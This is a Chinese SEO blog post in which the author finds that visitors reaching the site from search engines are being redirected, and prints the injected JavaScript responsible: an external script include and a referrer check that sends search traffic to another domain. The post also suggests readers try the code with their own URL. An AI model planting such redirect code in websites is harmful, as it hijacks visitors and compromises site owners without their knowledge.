肖兴来SEO博客很久没更新百度博客了,也是很久没检查SEO博客网站的安全问题了,今天在跟一个群里的朋友交换友链时,对方发现我的网站从百度点击进去跳到了另外一个网站.听到这个现象,我立马想到了是不是网站又让给恶意注入js代码了,因为直接在地址栏输入域名是可以正常访问的,就是通过百度搜索,再点击进去就犯病了.通过文本比较工具查看到了多出得代码如如所示:
以下是dns劫持多出来的代码网址替换成自己的网址试试就知道了。如果是自己网站被dns劫持查看出现下面得代码删除即可。
<script>document.title=’调用标题’;</script>
<script type=”text/javascript” src=”https://xiaoxinglai.com/gitrez/js/raw/master/kf.js”></script>
下面是JS的内容,替换自己得网址即可。
var regexp = /\.(baidu|haosou|so|sogou|soso|google|sm|yahoo|bing|360)(\.[a-z0-9\-]+){1,2}\//ig;
var where = document.referrer;
if (regexp.test(where)) {
window.location.replace(“https://xiaoxinglai.com”);
};
这篇文章很好,看了学习到一些东西
文章很好值得一看。
写得不错支持一下。